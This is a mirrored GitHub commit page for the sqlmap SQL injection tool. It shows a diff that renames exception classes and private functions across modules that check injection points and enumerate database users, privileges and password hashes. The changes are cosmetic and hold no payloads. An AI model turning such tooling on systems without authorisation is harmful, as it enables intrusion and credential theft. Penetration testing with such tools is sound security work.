sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-01-24 08:14:24 +03:00
Code Issues Packages Projects Releases Wiki Activity

Doing some more style updating (capitalization of exception classes; using _ is enough for private members - __ is used in Python specific methods)

Browse Source
This commit is contained in:
Miroslav Stampar 2012-12-06 14:14:19 +01:00
parent 003d21e962
commit 974407396e
102 changed files with 1115 additions and 1091 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
_sqlmap.py
View File

@ -28,8 +28,8 @@ from lib.core.data import logger
from lib.core.data import paths from lib.core.data import paths
from lib.core.common import unhandledExceptionMessage from lib.core.common import unhandledExceptionMessage
from lib.core.exception import exceptionsTuple from lib.core.exception import exceptionsTuple
from lib.core.exception import sqlmapSilentQuitException from lib.core.exception import SqlmapSilentQuitException
from lib.core.exception import sqlmapUserQuitException from lib.core.exception import SqlmapUserQuitException
from lib.core.option import init from lib.core.option import init
from lib.core.profiling import profile from lib.core.profiling import profile
from lib.core.settings import LEGAL_DISCLAIMER from lib.core.settings import LEGAL_DISCLAIMER
@ -72,11 +72,11 @@ def main():
else: else:
start() start()
except sqlmapUserQuitException: except SqlmapUserQuitException:
errMsg = "user quit" errMsg = "user quit"
logger.error(errMsg) logger.error(errMsg)
except (sqlmapSilentQuitException, bdb.BdbQuit): except (SqlmapSilentQuitException, bdb.BdbQuit):
pass pass
except exceptionsTuple, e: except exceptionsTuple, e:

12
lib/controller/action.py
View File

@ -13,8 +13,8 @@ from lib.core.data import conf
from lib.core.data import kb from lib.core.data import kb
from lib.core.data import logger from lib.core.data import logger
from lib.core.data import paths from lib.core.data import paths
from lib.core.exception import sqlmapNoneDataException from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import sqlmapUnsupportedDBMSException from lib.core.exception import SqlmapUnsupportedDBMSException
from lib.core.settings import SUPPORTED_DBMS from lib.core.settings import SUPPORTED_DBMS
from lib.techniques.brute.use import columnExists from lib.techniques.brute.use import columnExists
from lib.techniques.brute.use import tableExists from lib.techniques.brute.use import tableExists
@ -52,7 +52,7 @@ def action():
errMsg += ". Support for this DBMS will be implemented at " errMsg += ". Support for this DBMS will be implemented at "
errMsg += "some point" errMsg += "some point"
raise sqlmapUnsupportedDBMSException, errMsg raise SqlmapUnsupportedDBMSException, errMsg
dataToStdout("%s\n" % conf.dbmsHandler.getFingerprint()) dataToStdout("%s\n" % conf.dbmsHandler.getFingerprint())
@ -79,7 +79,7 @@ def action():
try: try:
conf.dumper.userSettings("database management system users password hashes", conf.dumper.userSettings("database management system users password hashes",
conf.dbmsHandler.getPasswordHashes(), "password hash") conf.dbmsHandler.getPasswordHashes(), "password hash")
except sqlmapNoneDataException, ex: except SqlmapNoneDataException, ex:
logger.critical(ex) logger.critical(ex)
except: except:
raise raise
@ -88,7 +88,7 @@ def action():
try: try:
conf.dumper.userSettings("database management system users privileges", conf.dumper.userSettings("database management system users privileges",
conf.dbmsHandler.getPrivileges(), "privilege") conf.dbmsHandler.getPrivileges(), "privilege")
except sqlmapNoneDataException, ex: except SqlmapNoneDataException, ex:
logger.critical(ex) logger.critical(ex)
except: except:
raise raise
@ -97,7 +97,7 @@ def action():
try: try:
conf.dumper.userSettings("database management system users roles", conf.dumper.userSettings("database management system users roles",
conf.dbmsHandler.getRoles(), "role") conf.dbmsHandler.getRoles(), "role")
except sqlmapNoneDataException, ex: except SqlmapNoneDataException, ex:
logger.critical(ex) logger.critical(ex)
except: except:
raise raise

32
lib/controller/checks.py
View File

@ -47,10 +47,10 @@ from lib.core.enums import HTTPMETHOD
from lib.core.enums import NULLCONNECTION from lib.core.enums import NULLCONNECTION
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD
from lib.core.enums import PLACE from lib.core.enums import PLACE
from lib.core.exception import sqlmapConnectionException from lib.core.exception import SqlmapConnectionException
from lib.core.exception import sqlmapNoneDataException from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import sqlmapSilentQuitException from lib.core.exception import SqlmapSilentQuitException
from lib.core.exception import sqlmapUserQuitException from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import FORMAT_EXCEPTION_STRINGS from lib.core.settings import FORMAT_EXCEPTION_STRINGS
from lib.core.settings import HEURISTIC_CHECK_ALPHABET from lib.core.settings import HEURISTIC_CHECK_ALPHABET
from lib.core.settings import SUHOSHIN_MAX_VALUE_LENGTH from lib.core.settings import SUHOSHIN_MAX_VALUE_LENGTH
@ -407,7 +407,7 @@ def checkSqlInjection(place, parameter, value):
injectable = True injectable = True
except sqlmapConnectionException, msg: except SqlmapConnectionException, msg:
debugMsg = "problem occured most likely because the " debugMsg = "problem occured most likely because the "
debugMsg += "server hasn't recovered as expected from the " debugMsg += "server hasn't recovered as expected from the "
debugMsg += "error-based payload used ('%s')" % msg debugMsg += "error-based payload used ('%s')" % msg
@ -546,7 +546,7 @@ def checkSqlInjection(place, parameter, value):
elif choice[0] in ("e", "E"): elif choice[0] in ("e", "E"):
kb.endDetection = True kb.endDetection = True
elif choice[0] in ("q", "Q"): elif choice[0] in ("q", "Q"):
raise sqlmapUserQuitException raise SqlmapUserQuitException
finally: finally:
# Reset forced back-end DBMS value # Reset forced back-end DBMS value
@ -749,7 +749,7 @@ def checkDynParam(place, parameter, value):
randInt = randomInt() randInt = randomInt()
payload = agent.payload(place, parameter, value, getUnicode(randInt)) payload = agent.payload(place, parameter, value, getUnicode(randInt))
dynResult = Request.queryPage(payload, place, raise404=False) dynResult = Request.queryPage(payload, place, raise404=False)
except sqlmapConnectionException: except SqlmapConnectionException:
pass pass
result = None if dynResult is None else not dynResult result = None if dynResult is None else not dynResult
@ -848,7 +848,7 @@ def checkStability():
test = readInput(message, default="C") test = readInput(message, default="C")
if test and test[0] in ("q", "Q"): if test and test[0] in ("q", "Q"):
raise sqlmapUserQuitException raise SqlmapUserQuitException
elif test and test[0] in ("s", "S"): elif test and test[0] in ("s", "S"):
showStaticWords(firstPage, secondPage) showStaticWords(firstPage, secondPage)
@ -867,7 +867,7 @@ def checkStability():
kb.nullConnection = None kb.nullConnection = None
else: else:
errMsg = "Empty value supplied" errMsg = "Empty value supplied"
raise sqlmapNoneDataException, errMsg raise SqlmapNoneDataException, errMsg
elif test and test[0] in ("r", "R"): elif test and test[0] in ("r", "R"):
message = "please enter value for parameter 'regex': " message = "please enter value for parameter 'regex': "
@ -884,7 +884,7 @@ def checkStability():
kb.nullConnection = None kb.nullConnection = None
else: else:
errMsg = "Empty value supplied" errMsg = "Empty value supplied"
raise sqlmapNoneDataException, errMsg raise SqlmapNoneDataException, errMsg
else: else:
checkDynamicContent(firstPage, secondPage) checkDynamicContent(firstPage, secondPage)
@ -1013,9 +1013,9 @@ def checkNullConnection():
infoMsg += "'%s'" % kb.nullConnection infoMsg += "'%s'" % kb.nullConnection
logger.info(infoMsg) logger.info(infoMsg)
except sqlmapConnectionException, errMsg: except SqlmapConnectionException, errMsg:
errMsg = getUnicode(errMsg) errMsg = getUnicode(errMsg)
raise sqlmapConnectionException, errMsg raise SqlmapConnectionException, errMsg
return kb.nullConnection is not None return kb.nullConnection is not None
@ -1025,7 +1025,7 @@ def checkConnection(suppressOutput=False):
socket.getaddrinfo(conf.hostname, None) socket.getaddrinfo(conf.hostname, None)
except socket.gaierror: except socket.gaierror:
errMsg = "host '%s' does not exist" % conf.hostname errMsg = "host '%s' does not exist" % conf.hostname
raise sqlmapConnectionException, errMsg raise SqlmapConnectionException, errMsg
if not suppressOutput: if not suppressOutput:
infoMsg = "testing connection to the target url" infoMsg = "testing connection to the target url"
@ -1039,7 +1039,7 @@ def checkConnection(suppressOutput=False):
if not kb.originalPage and wasLastRequestHTTPError(): if not kb.originalPage and wasLastRequestHTTPError():
errMsg = "unable to retrieve page content" errMsg = "unable to retrieve page content"
raise sqlmapConnectionException, errMsg raise SqlmapConnectionException, errMsg
elif wasLastRequestDBMSError(): elif wasLastRequestDBMSError():
warnMsg = "there is a DBMS error found in the HTTP response body " warnMsg = "there is a DBMS error found in the HTTP response body "
warnMsg += "which could interfere with the results of the tests" warnMsg += "which could interfere with the results of the tests"
@ -1051,7 +1051,7 @@ def checkConnection(suppressOutput=False):
else: else:
kb.errorIsNone = True kb.errorIsNone = True
except sqlmapConnectionException, errMsg: except SqlmapConnectionException, errMsg:
errMsg = getUnicode(errMsg) errMsg = getUnicode(errMsg)
logger.critical(errMsg) logger.critical(errMsg)
@ -1069,7 +1069,7 @@ def checkConnection(suppressOutput=False):
msg = "it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] " msg = "it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] "
if readInput(msg, default="Y") not in ("n", "N"): if readInput(msg, default="Y") not in ("n", "N"):
raise sqlmapSilentQuitException raise SqlmapSilentQuitException
else: else:
kb.ignoreNotFound = True kb.ignoreNotFound = True
else: else:

50
lib/controller/controller.py
View File

@ -41,11 +41,11 @@ from lib.core.enums import HTTPMETHOD
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD
from lib.core.enums import PLACE from lib.core.enums import PLACE
from lib.core.exception import exceptionsTuple from lib.core.exception import exceptionsTuple
from lib.core.exception import sqlmapNoneDataException from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import sqlmapNotVulnerableException from lib.core.exception import SqlmapNotVulnerableException
from lib.core.exception import sqlmapSilentQuitException from lib.core.exception import SqlmapSilentQuitException
from lib.core.exception import sqlmapValueException from lib.core.exception import SqlmapValueException
from lib.core.exception import sqlmapUserQuitException from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import ASP_NET_CONTROL_REGEX from lib.core.settings import ASP_NET_CONTROL_REGEX
from lib.core.settings import DEFAULT_GET_POST_DELIMITER from lib.core.settings import DEFAULT_GET_POST_DELIMITER
from lib.core.settings import EMPTY_FORM_FIELDS_REGEX from lib.core.settings import EMPTY_FORM_FIELDS_REGEX
@ -58,7 +58,7 @@ from lib.core.target import initTargetEnv
from lib.core.target import setupTargetEnv from lib.core.target import setupTargetEnv
from thirdparty.pagerank.pagerank import get_pagerank from thirdparty.pagerank.pagerank import get_pagerank
def __selectInjection(): def _selectInjection():
""" """
Selection function for injection place, parameters and type. Selection function for injection place, parameters and type.
""" """
@ -113,14 +113,14 @@ def __selectInjection():
if select.isdigit() and int(select) < len(kb.injections) and int(select) >= 0: if select.isdigit() and int(select) < len(kb.injections) and int(select) >= 0:
index = int(select) index = int(select)
elif select[0] in ( "Q", "q" ): elif select[0] in ( "Q", "q" ):
raise sqlmapUserQuitException raise SqlmapUserQuitException
else: else:
errMsg = "invalid choice" errMsg = "invalid choice"
raise sqlmapValueException, errMsg raise SqlmapValueException, errMsg
kb.injection = kb.injections[index] kb.injection = kb.injections[index]
def __formatInjection(inj): def _formatInjection(inj):
data = "Place: %s\n" % inj.place data = "Place: %s\n" % inj.place
data += "Parameter: %s\n" % inj.parameter data += "Parameter: %s\n" % inj.parameter
@ -143,11 +143,11 @@ def __formatInjection(inj):
return data return data
def __showInjections(): def _showInjections():
header = "sqlmap identified the following injection points with " header = "sqlmap identified the following injection points with "
header += "a total of %d HTTP(s) requests" % kb.testQueryCount header += "a total of %d HTTP(s) requests" % kb.testQueryCount
data = "".join(set(map(lambda x: __formatInjection(x), kb.injections))).rstrip("\n") data = "".join(set(map(lambda x: _formatInjection(x), kb.injections))).rstrip("\n")
conf.dumper.technic(header, data) conf.dumper.technic(header, data)
@ -156,7 +156,7 @@ def __showInjections():
infoMsg += "included in shown payload content(s)" infoMsg += "included in shown payload content(s)"
logger.info(infoMsg) logger.info(infoMsg)
def __randomFillBlankFields(value): def _randomFillBlankFields(value):
retVal = value retVal = value
if extractRegexResult(EMPTY_FORM_FIELDS_REGEX, value): if extractRegexResult(EMPTY_FORM_FIELDS_REGEX, value):
@ -173,7 +173,7 @@ def __randomFillBlankFields(value):
return retVal return retVal
def __saveToHashDB(): def _saveToHashDB():
injections = hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or [] injections = hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []
injections.extend(_ for _ in kb.injections if _ and _.place is not None and _.parameter is not None) injections.extend(_ for _ in kb.injections if _ and _.place is not None and _.parameter is not None)
@ -196,7 +196,7 @@ def __saveToHashDB():
if not hashDBRetrieve(HASHDB_KEYS.KB_DYNAMIC_MARKINGS): if not hashDBRetrieve(HASHDB_KEYS.KB_DYNAMIC_MARKINGS):
hashDBWrite(HASHDB_KEYS.KB_DYNAMIC_MARKINGS, kb.dynamicMarkings, True) hashDBWrite(HASHDB_KEYS.KB_DYNAMIC_MARKINGS, kb.dynamicMarkings, True)
def __saveToResultsFile(): def _saveToResultsFile():
if not conf.resultsFP: if not conf.resultsFP:
return return
@ -310,7 +310,7 @@ def start():
if conf.method == HTTPMETHOD.POST: if conf.method == HTTPMETHOD.POST:
message = "Edit POST data [default: %s]%s: " % (urlencode(conf.data) if conf.data else "None", " (Warning: blank fields detected)" if conf.data and extractRegexResult(EMPTY_FORM_FIELDS_REGEX, conf.data) else "") message = "Edit POST data [default: %s]%s: " % (urlencode(conf.data) if conf.data else "None", " (Warning: blank fields detected)" if conf.data and extractRegexResult(EMPTY_FORM_FIELDS_REGEX, conf.data) else "")
conf.data = readInput(message, default=conf.data) conf.data = readInput(message, default=conf.data)
conf.data = __randomFillBlankFields(conf.data) conf.data = _randomFillBlankFields(conf.data)
conf.data = urldecode(conf.data) if conf.data and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data conf.data = urldecode(conf.data) if conf.data and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data
elif conf.method == HTTPMETHOD.GET: elif conf.method == HTTPMETHOD.GET:
@ -319,7 +319,7 @@ def start():
secondPart = targetUrl[targetUrl.find("?")+1:] secondPart = targetUrl[targetUrl.find("?")+1:]
message = "Edit GET data [default: %s]: " % secondPart message = "Edit GET data [default: %s]: " % secondPart
test = readInput(message, default=secondPart) test = readInput(message, default=secondPart)
test = __randomFillBlankFields(test) test = _randomFillBlankFields(test)
conf.url = "%s?%s" % (firstPart, test) conf.url = "%s?%s" % (firstPart, test)
parseTargetUrl() parseTargetUrl()
@ -493,7 +493,7 @@ def start():
if kb.vainRun and not conf.multipleTargets: if kb.vainRun and not conf.multipleTargets:
errMsg = "no parameter(s) found for testing in the provided data " errMsg = "no parameter(s) found for testing in the provided data "
errMsg += "(e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')" errMsg += "(e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')"
raise sqlmapNoneDataException, errMsg raise SqlmapNoneDataException, errMsg
else: else:
errMsg = "all tested parameters appear to be not injectable." errMsg = "all tested parameters appear to be not injectable."
@ -541,15 +541,15 @@ def start():
errMsg += "expression that you have choosen " errMsg += "expression that you have choosen "
errMsg += "does not match exclusively True responses" errMsg += "does not match exclusively True responses"
raise sqlmapNotVulnerableException, errMsg raise SqlmapNotVulnerableException, errMsg
else: else:
# Flush the flag # Flush the flag
kb.testMode = False kb.testMode = False
__saveToResultsFile() _saveToResultsFile()
__saveToHashDB() _saveToHashDB()
__showInjections() _showInjections()
__selectInjection() _selectInjection()
if kb.injection.place is not None and kb.injection.parameter is not None: if kb.injection.place is not None and kb.injection.parameter is not None:
if conf.multipleTargets: if conf.multipleTargets:
@ -576,14 +576,14 @@ def start():
elif test[0] in ("n", "N"): elif test[0] in ("n", "N"):
return False return False
elif test[0] in ("q", "Q"): elif test[0] in ("q", "Q"):
raise sqlmapUserQuitException raise SqlmapUserQuitException
else: else:
raise raise
except sqlmapUserQuitException: except SqlmapUserQuitException:
raise raise
except sqlmapSilentQuitException: except SqlmapSilentQuitException:
raise raise
except exceptionsTuple, e: except exceptionsTuple, e:

4
lib/core/agent.py
View File

@ -24,7 +24,7 @@ from lib.core.enums import DBMS
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD
from lib.core.enums import PLACE from lib.core.enums import PLACE
from lib.core.enums import POST_HINT from lib.core.enums import POST_HINT
from lib.core.exception import sqlmapNoneDataException from lib.core.exception import SqlmapNoneDataException
from lib.core.settings import ASTERISK_MARKER from lib.core.settings import ASTERISK_MARKER
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
from lib.core.settings import GENERIC_SQL_COMMENT from lib.core.settings import GENERIC_SQL_COMMENT
@ -252,7 +252,7 @@ class Agent(object):
else: else:
errMsg = "invalid usage of inference payload without " errMsg = "invalid usage of inference payload without "
errMsg += "knowledge of underlying DBMS" errMsg += "knowledge of underlying DBMS"
raise sqlmapNoneDataException, errMsg raise SqlmapNoneDataException, errMsg
return payload return payload

62
lib/core/common.py
View File

@ -67,14 +67,14 @@ from lib.core.enums import PLACE
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD
from lib.core.enums import REFLECTIVE_COUNTER from lib.core.enums import REFLECTIVE_COUNTER
from lib.core.enums import SORT_ORDER from lib.core.enums import SORT_ORDER
from lib.core.exception import sqlmapDataException from lib.core.exception import SqlmapDataException
from lib.core.exception import sqlmapFilePathException from lib.core.exception import SqlmapFilePathException
from lib.core.exception import sqlmapGenericException from lib.core.exception import SqlmapGenericException
from lib.core.exception import sqlmapNoneDataException from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import sqlmapMissingDependence from lib.core.exception import SqlmapMissingDependence
from lib.core.exception import sqlmapSilentQuitException from lib.core.exception import SqlmapSilentQuitException
from lib.core.exception import sqlmapSyntaxException from lib.core.exception import SqlmapSyntaxException
from lib.core.exception import sqlmapUserQuitException from lib.core.exception import SqlmapUserQuitException
from lib.core.log import LOGGER_HANDLER from lib.core.log import LOGGER_HANDLER
from lib.core.optiondict import optDict from lib.core.optiondict import optDict
from lib.core.settings import BOLD_PATTERNS from lib.core.settings import BOLD_PATTERNS
@ -539,7 +539,7 @@ def paramToDict(place, parameters=None):
message = "Are you sure you want to continue? [y/N] " message = "Are you sure you want to continue? [y/N] "
test = readInput(message, default="N") test = readInput(message, default="N")
if test[0] not in ("y", "Y"): if test[0] not in ("y", "Y"):
raise sqlmapSilentQuitException raise SqlmapSilentQuitException
if conf.testParameter and not testableParameters: if conf.testParameter and not testableParameters:
paramStr = ", ".join(test for test in conf.testParameter) paramStr = ", ".join(test for test in conf.testParameter)
@ -806,7 +806,7 @@ def readInput(message, default=None, checkBatch=True):
except: except:
time.sleep(0.05) # Reference: http://www.gossamer-threads.com/lists/python/python/781893 time.sleep(0.05) # Reference: http://www.gossamer-threads.com/lists/python/python/781893
kb.prependFlag = True kb.prependFlag = True
raise sqlmapUserQuitException raise SqlmapUserQuitException
finally: finally:
logging._releaseLock() logging._releaseLock()
@ -853,7 +853,7 @@ def checkFile(filename):
""" """
if not os.path.isfile(filename): if not os.path.isfile(filename):
raise sqlmapFilePathException, "unable to read file '%s'" % filename raise SqlmapFilePathException, "unable to read file '%s'" % filename
def banner(): def banner():
""" """
@ -989,7 +989,7 @@ def parseTargetDirect():
errMsg = "invalid target details, valid syntax is for instance " errMsg = "invalid target details, valid syntax is for instance "
errMsg += "'mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME' " errMsg += "'mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME' "
errMsg += "or 'access://DATABASE_FILEPATH'" errMsg += "or 'access://DATABASE_FILEPATH'"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
for dbmsName, data in DBMS_DICT.items(): for dbmsName, data in DBMS_DICT.items():
if conf.dbms in data[0]: if conf.dbms in data[0]:
@ -1004,7 +1004,7 @@ def parseTargetDirect():
conf.port = 0 conf.port = 0
elif not remote: elif not remote:
errMsg = "missing remote connection details" errMsg = "missing remote connection details"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if dbmsName in (DBMS.MSSQL, DBMS.SYBASE): if dbmsName in (DBMS.MSSQL, DBMS.SYBASE):
import _mssql import _mssql
@ -1014,7 +1014,7 @@ def parseTargetDirect():
errMsg = "'%s' third-party library must be " % data[1] errMsg = "'%s' third-party library must be " % data[1]
errMsg += "version >= 1.0.2 to work properly. " errMsg += "version >= 1.0.2 to work properly. "
errMsg += "Download from '%s'" % data[2] errMsg += "Download from '%s'" % data[2]
raise sqlmapMissingDependence, errMsg raise SqlmapMissingDependence, errMsg
elif dbmsName == DBMS.MYSQL: elif dbmsName == DBMS.MYSQL:
import pymysql import pymysql
@ -1032,7 +1032,7 @@ def parseTargetDirect():
errMsg = "sqlmap requires '%s' third-party library " % data[1] errMsg = "sqlmap requires '%s' third-party library " % data[1]
errMsg += "in order to directly connect to the database " errMsg += "in order to directly connect to the database "
errMsg += "%s. Download from '%s'" % (dbmsName, data[2]) errMsg += "%s. Download from '%s'" % (dbmsName, data[2])
raise sqlmapMissingDependence, errMsg raise SqlmapMissingDependence, errMsg
def parseTargetUrl(): def parseTargetUrl():
""" """
@ -1047,7 +1047,7 @@ def parseTargetUrl():
if re.search("\[.+\]", conf.url) and not socket.has_ipv6: if re.search("\[.+\]", conf.url) and not socket.has_ipv6:
errMsg = "IPv6 addressing is not supported " errMsg = "IPv6 addressing is not supported "
errMsg += "on this platform" errMsg += "on this platform"
raise sqlmapGenericException, errMsg raise SqlmapGenericException, errMsg
if not re.search("^http[s]*://", conf.url, re.I): if not re.search("^http[s]*://", conf.url, re.I):
if ":443/" in conf.url: if ":443/" in conf.url:
@ -1075,14 +1075,14 @@ def parseTargetUrl():
if any((_ is None, re.search(r'\s', conf.hostname), '..' in conf.hostname, conf.hostname.startswith('.'))): if any((_ is None, re.search(r'\s', conf.hostname), '..' in conf.hostname, conf.hostname.startswith('.'))):
errMsg = "invalid target url" errMsg = "invalid target url"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if len(hostnamePort) == 2: if len(hostnamePort) == 2:
try: try:
conf.port = int(hostnamePort[1]) conf.port = int(hostnamePort[1])
except: except:
errMsg = "invalid target url" errMsg = "invalid target url"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
elif conf.scheme == "https": elif conf.scheme == "https":
conf.port = 443 conf.port = 443
else: else:
@ -1351,7 +1351,7 @@ def safeStringFormat(format_, params):
if count < len(params): if count < len(params):
retVal = retVal[:index] + getUnicode(params[count]) + retVal[index + 2:] retVal = retVal[:index] + getUnicode(params[count]) + retVal[index + 2:]
else: else:
raise sqlmapNoneDataException, "wrong number of parameters during string formatting" raise SqlmapNoneDataException, "wrong number of parameters during string formatting"
count += 1 count += 1
return retVal return retVal
@ -2420,11 +2420,11 @@ def initTechnique(technique=None):
warnMsg += "'%s'" % enumValueToNameLookup(PAYLOAD.TECHNIQUE, technique) warnMsg += "'%s'" % enumValueToNameLookup(PAYLOAD.TECHNIQUE, technique)
logger.warn(warnMsg) logger.warn(warnMsg)
except sqlmapDataException: except SqlmapDataException:
errMsg = "missing data in old session file(s). " errMsg = "missing data in old session file(s). "
errMsg += "Please use '--flush-session' to deal " errMsg += "Please use '--flush-session' to deal "
errMsg += "with this error" errMsg += "with this error"
raise sqlmapNoneDataException, errMsg raise SqlmapNoneDataException, errMsg
def arrayizeValue(value): def arrayizeValue(value):
""" """
@ -2543,7 +2543,7 @@ def openFile(filename, mode='r'):
errMsg += "Please check %s permissions on a file " % ("write" if \ errMsg += "Please check %s permissions on a file " % ("write" if \
mode and ('w' in mode or 'a' in mode or '+' in mode) else "read") mode and ('w' in mode or 'a' in mode or '+' in mode) else "read")
errMsg += "and that it's not locked by another process." errMsg += "and that it's not locked by another process."
raise sqlmapFilePathException, errMsg raise SqlmapFilePathException, errMsg
def decodeIntToUnicode(value): def decodeIntToUnicode(value):
""" """
@ -2857,7 +2857,7 @@ def expandMnemonics(mnemonics, parser, args):
if pointer in (None, head): if pointer in (None, head):
errMsg = "mnemonic '%s' can't be resolved to any parameter name" % name errMsg = "mnemonic '%s' can't be resolved to any parameter name" % name
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
elif len(pointer.current) > 1: elif len(pointer.current) > 1:
options = {} options = {}
@ -2896,7 +2896,7 @@ def expandMnemonics(mnemonics, parser, args):
setattr(args, found.dest, True) setattr(args, found.dest, True)
else: else:
errMsg = "mnemonic '%s' requires value of type '%s'" % (name, found.type) errMsg = "mnemonic '%s' requires value of type '%s'" % (name, found.type)
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
def safeCSValue(value): def safeCSValue(value):
""" """
@ -3044,7 +3044,7 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
if not content: if not content:
errMsg = "can't parse forms as the page content appears to be blank" errMsg = "can't parse forms as the page content appears to be blank"
if raise_: if raise_:
raise sqlmapGenericException, errMsg raise SqlmapGenericException, errMsg
else: else:
logger.debug(errMsg) logger.debug(errMsg)
@ -3064,7 +3064,7 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
except ParseError: except ParseError:
errMsg = "no success" errMsg = "no success"
if raise_: if raise_:
raise sqlmapGenericException, errMsg raise SqlmapGenericException, errMsg
else: else:
logger.debug(errMsg) logger.debug(errMsg)
@ -3085,7 +3085,7 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
errMsg = "there has been a problem while " errMsg = "there has been a problem while "
errMsg += "processing page forms ('%s')" % ex errMsg += "processing page forms ('%s')" % ex
if raise_: if raise_:
raise sqlmapGenericException, errMsg raise SqlmapGenericException, errMsg
else: else:
logger.debug(errMsg) logger.debug(errMsg)
else: else:
@ -3104,7 +3104,7 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
else: else:
errMsg = "there were no forms found at the given target url" errMsg = "there were no forms found at the given target url"
if raise_: if raise_:
raise sqlmapGenericException, errMsg raise SqlmapGenericException, errMsg
else: else:
logger.debug(errMsg) logger.debug(errMsg)
@ -3152,7 +3152,7 @@ def checkDeprecatedOptions(args):
errMsg = "switch/option '%s' is deprecated" % _ errMsg = "switch/option '%s' is deprecated" % _
if _ in DEPRECATED_HINTS: if _ in DEPRECATED_HINTS:
errMsg += " (hint: %s)" % DEPRECATED_HINTS[_] errMsg += " (hint: %s)" % DEPRECATED_HINTS[_]
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
def evaluateCode(code, variables=None): def evaluateCode(code, variables=None):
""" """
@ -3165,7 +3165,7 @@ def evaluateCode(code, variables=None):
raise raise
except Exception, ex: except Exception, ex:
errMsg = "an error occured while evaluating provided code ('%s'). " % ex errMsg = "an error occured while evaluating provided code ('%s'). " % ex
raise sqlmapGenericException, errMsg raise SqlmapGenericException, errMsg
def serializeObject(object_): def serializeObject(object_):
""" """
@ -3304,7 +3304,7 @@ def resetCookieJar(cookieJar):
except cookielib.LoadError, msg: except cookielib.LoadError, msg:
errMsg = "there was a problem loading " errMsg = "there was a problem loading "
errMsg += "cookies file ('%s')" % msg errMsg += "cookies file ('%s')" % msg
raise sqlmapGenericException, errMsg raise SqlmapGenericException, errMsg
def prioritySortColumns(columns): def prioritySortColumns(columns):
""" """

4
lib/core/datatype.py
View File

@ -8,7 +8,7 @@ See the file 'doc/COPYING' for copying permission
import copy import copy
import types import types
from lib.core.exception import sqlmapDataException from lib.core.exception import SqlmapDataException
class AttribDict(dict): class AttribDict(dict):
""" """
@ -38,7 +38,7 @@ class AttribDict(dict):
try: try:
return self.__getitem__(item) return self.__getitem__(item)
except KeyError: except KeyError:
raise sqlmapDataException, "unable to access item '%s'" % item raise SqlmapDataException, "unable to access item '%s'" % item
def __setattr__(self, item, value): def __setattr__(self, item, value):
""" """

8
lib/core/dump.py
View File

@ -27,8 +27,8 @@ from lib.core.data import logger
from lib.core.dicts import DUMP_REPLACEMENTS from lib.core.dicts import DUMP_REPLACEMENTS
from lib.core.enums import DBMS from lib.core.enums import DBMS
from lib.core.enums import DUMP_FORMAT from lib.core.enums import DUMP_FORMAT
from lib.core.exception import sqlmapGenericException from lib.core.exception import SqlmapGenericException
from lib.core.exception import sqlmapValueException from lib.core.exception import SqlmapValueException
from lib.core.replication import Replication from lib.core.replication import Replication
from lib.core.settings import HTML_DUMP_CSS_STYLE from lib.core.settings import HTML_DUMP_CSS_STYLE
from lib.core.settings import METADB_SUFFIX from lib.core.settings import METADB_SUFFIX
@ -68,7 +68,7 @@ class Dump(object):
self._outputFP = codecs.open(self._outputFile, "ab", UNICODE_ENCODING) self._outputFP = codecs.open(self._outputFile, "ab", UNICODE_ENCODING)
except IOError, ex: except IOError, ex:
errMsg = "error occurred while opening log file ('%s')" % ex errMsg = "error occurred while opening log file ('%s')" % ex
raise sqlmapGenericException, errMsg raise SqlmapGenericException, errMsg
def getOutputFile(self): def getOutputFile(self):
return self._outputFile return self._outputFile
@ -490,7 +490,7 @@ class Dump(object):
if conf.dumpFormat == DUMP_FORMAT.SQLITE: if conf.dumpFormat == DUMP_FORMAT.SQLITE:
try: try:
rtable.insert(values) rtable.insert(values)
except sqlmapValueException: except SqlmapValueException:
pass pass
elif conf.dumpFormat == DUMP_FORMAT.CSV: elif conf.dumpFormat == DUMP_FORMAT.CSV:
dataToDumpFile(dumpFP, "\n") dataToDumpFile(dumpFP, "\n")

72
lib/core/exception.py
View File

@ -5,79 +5,79 @@ Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission See the file 'doc/COPYING' for copying permission
""" """
class sqlmapCompressionException(Exception): class SqlmapCompressionException(Exception):
pass pass
class sqlmapConnectionException(Exception): class SqlmapConnectionException(Exception):
pass pass
class sqlmapDataException(Exception): class SqlmapDataException(Exception):
pass pass
class sqlmapFilePathException(Exception): class SqlmapFilePathException(Exception):
pass pass
